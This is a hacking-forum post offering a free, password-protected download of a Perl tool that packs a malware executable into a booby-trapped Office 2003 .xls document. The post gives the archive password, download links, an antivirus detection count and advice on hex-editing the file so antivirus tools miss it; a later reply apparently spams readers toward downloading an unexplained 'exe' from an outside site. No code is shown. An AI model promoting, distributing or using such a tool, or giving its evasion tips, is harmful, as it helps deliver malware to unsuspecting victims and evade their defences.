Guest expl0iter

[EXploiT] ►Convert EXE to Xls Exploit►[ms office 2003 exploit] (Free)

Guest expl0iter

Well,

This Exploit will Convert your malware {bot} ,i.e any exe file to .Xls {office document}

19370769.png

Before you attempt to use this Exploit Make Sure you have "Perl" Installed

Virus scan Result:-Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org 1/16 :huh:

Usage:-Watch Video in Full Screen for HQ..

YouTube - ?office 2003 exploiT??

The converted output file will not be fud i.e .Xls Document but you can hex it to make it Fud

Password is:- darkhk3r

Download Link:-Download Darkhk3r OfficE to XlS Exploit.rar. :pirate:

Or

Download Link:-ShareCash.Org - Make Money Uploading Files! - Darkhk3r OfficE to XlS Exploit.rar :pirate:

No one is Allowed To Post an Direct Link or Mirror,if Found Will be Reported & in Future there Will Be no Update's on any of My Exploits...

Active Perl Setup:-Download ActivePerl 5.14.0.1400 Free - A complete, quality-assured and ready-to-install Perl distribution for Windows - Softpedia

:pirate:

src: hackforums.com

Edited by expl0iter

This file convert.exe is appear in the window XP or drivers which can be create error that's why your system is not responding properly. if you want to overcome such type of error then you have to need to download the new exe file with the help of https://unfitpc.com/xconvert-exe it is the best way to recover your issue.

Edited by rajan132
  • Downvote 1